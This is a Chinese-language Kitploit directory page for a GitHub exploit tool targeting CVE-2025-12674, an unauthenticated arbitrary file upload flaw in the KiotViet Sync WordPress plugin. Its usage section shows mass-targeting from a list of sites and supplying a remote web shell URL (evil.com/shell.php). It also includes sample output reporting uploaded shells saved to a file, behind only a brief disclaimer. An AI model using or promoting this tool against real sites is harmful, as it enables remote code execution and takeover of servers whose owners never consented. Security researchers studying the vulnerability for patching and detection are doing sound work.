Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-12674 — KiotViet Sync <= 1.8.5 - 未授权任意文件上传 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-12674
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubnxploited/cve-2025-12674

CVE-2025-12674

KiotViet Sync <= 1.8.5 - 未授权任意文件上传

查看仓库
218个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-12674

KiotViet Sync <= 1.8.5 - 未认证任意文件上传

🐚 KiotViet Sync <= 1.8.5 - 未认证任意文件上传


📝 描述

WordPress 的 KiotViet Sync 插件(版本 1.8.5 及以下)存在任意文件上传漏洞,原因在于 create_media() 函数缺少文件类型验证。
该漏洞允许 未认证的攻击者 向服务器上传任意文件,可能导致 远程代码执行。

  • CVE: CVE-2025-12674
  • CVSS: 9.8 (严重)

🚀 使用方法

  1. 克隆此仓库,或下载脚本。

  2. 准备目标:
    每行一个目标,存放在名为 list.txt 的文件中。

    example.com
    site2.com
    http://site3.com
    
  3. 运行漏洞利用脚本:
    脚本名称:

    CVE-2025-12674.py
    
    python3 CVE-2025-12674.py
    
  4. 根据提示输入选项:

    Enter targets file name (default: list.txt): list.txt
    Enter number of threads (default: 10): 
    Enter REMOTE SHELL URL (direct link): http://evil.com/shell.php
    ╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
    │ Loaded 1 targets. Threads: 10.                                                                                           │
    ╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
    ╭──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
    │ http://nxk.ddev.site                                                                                                     │
    │ Trying KiotViet exploit...                                                                                               │
    ╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
    ╔══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
    ║ ✔ Shell uploaded!                                                                                                        ║
    ║ Check here:                                                                                                              ║
    ║ http://nxk.ddev.site/wp-content/uploads/2026/01/                                                                         ║
    ║                                                                                                                          ║
    ╚══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════╝
               Summary           
                                 
      Metric              Value  
     ─────────────────────────── 
      Total attempts          1  
      Successful shells       1  
      Failed attempts         0  
    
  • 上传 shell 的输出目录不会显示文件名(因为它是动态生成的)。

📂 输出

  • 所有成功的 shell 路径会保存到 shells.txt。
  • 输出会自动备份并附带时间戳。

⚠️ 免责声明

本脚本仅供教育和授权的安全测试使用。
未经授权,对您不拥有或未获得明确测试许可的系统进行使用是非法且不道德的。
作者不对滥用或造成的任何损害承担责任。


👤 作者

Nxploited (Khaled Alenazi)

下载工具